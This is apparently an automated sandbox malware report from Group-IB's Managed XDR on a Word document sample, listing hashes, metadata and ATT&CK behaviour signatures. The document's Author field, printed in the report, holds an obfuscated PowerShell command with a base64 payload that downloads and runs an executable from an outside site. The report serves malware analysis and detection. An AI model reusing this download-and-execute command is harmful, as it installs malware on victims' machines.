Managed XDR
Group-IB MDP Report
File info
Filename: c-users-user-desktop-04665ae85b968c9c3962b3f9abafada97052.doc-copy
File Type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: POWERSHell.eXe -ExecUtIoNpOlIcy BYPaSS -noprOFiLe -WiNDoWsTYle HiDdeN -ENCoDEdCoMmaNd IAAgACgAbgBlAFcALQBvAEIAagBlAEMAVAAgAHMAWQBzAHQAZQBNAC4ATgBlAFQALgBXAGUAQgBjAEwAaQBFAG4AdAApAC4AZABPAFcAbgBMAE8AYQBEAGYAaQBMAEUAKAAgACAAHSBoAHQAdABwADoALwAvAHcAdwB3AC4AbgBvAGkAbgBhAHUAcABoAG8ALgBjAG8AbQAuAHYAbgAvAGYAaQBsAGUAcwAvAGEAbgBuAGEALgBlAHgAZQAdICAAIAAsACAAIAAdICQAZQBOAHYAOgBhAFAAUABkAEEAdABBAFwAcABzAHMAdAAuAGUAeABlAB0gIAAgACkAIAAgADsAIAAgAFMAVABhAFIAVAAgACAAHSAkAEUATgB2ADoAYQBQAHAAZABhAFQAQQBcAHAAcwBzAHQALgBlAHgAZQAdIA==, Template: Normal, Last Saved By: george, Revision Number: 5, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Aug 11 13:36:00 2017, Last Saved Time/Date: Fri Dec 20 17:24:00 2024, Number of Pages: 1, Number of Words: 1, Number of Characters: 6, Security: 0
File Size: 481 KB
Env info
win7/x86 en
Hashes
SHA1: 0923e438fabcd37195af78acc368e1777fda8345
SHA256: feb70e9a71553e4adce33e0c9788ebe2560b36f12ee7f2d84e6b4a408b832151
MD5: e08c7e3b2c24cefc20ba52176e5580e3
Signatures
Privilege Escalation
T1134 opens_thread_token: Opens the access token associated with a thread
T1134 opens_process_token: Opens the access token associated with a process
Defense Evasion
T1134 opens_thread_token: Opens the access token associated with a thread
T1134 opens_process_token: Opens the access token associated with a process
T1497 evasion_trustrecords: Attempts to detect Sandbox exploring trusted documents
T1497.001 antivm_queries_computername: Retrieves the computer name
Credential Access
T1552 cookie_files: Accesses cookie files
T1555.003 cookie_files: Accesses cookie files
Discovery
T1083 checks_recent_files: Attempt to check recently opened files through registry
T1135 server_share_info: Retrieves information about each shared resource on a server
T1497 evasion_trustrecords: Attempts to detect Sandbox exploring trusted documents
T1497.001 antivm_queries_computername: Retrieves the computer name
Other
yara_rules: Static rules
create_rpc_bindings: Creates RPC connection
get_policy_info: Retrieves information about a Policy object
test_check_service: Starts services
antisandbox_check_graphics_card: Uses CreateDXGIFactory, potentially to detect graphics card
next report: 9fb9537c-0cce-4909-8f40-dd78d5cc1993
previous report: 4b5aa4ad-d8a3-4dd9-ac44-f13414697620
Managed XDR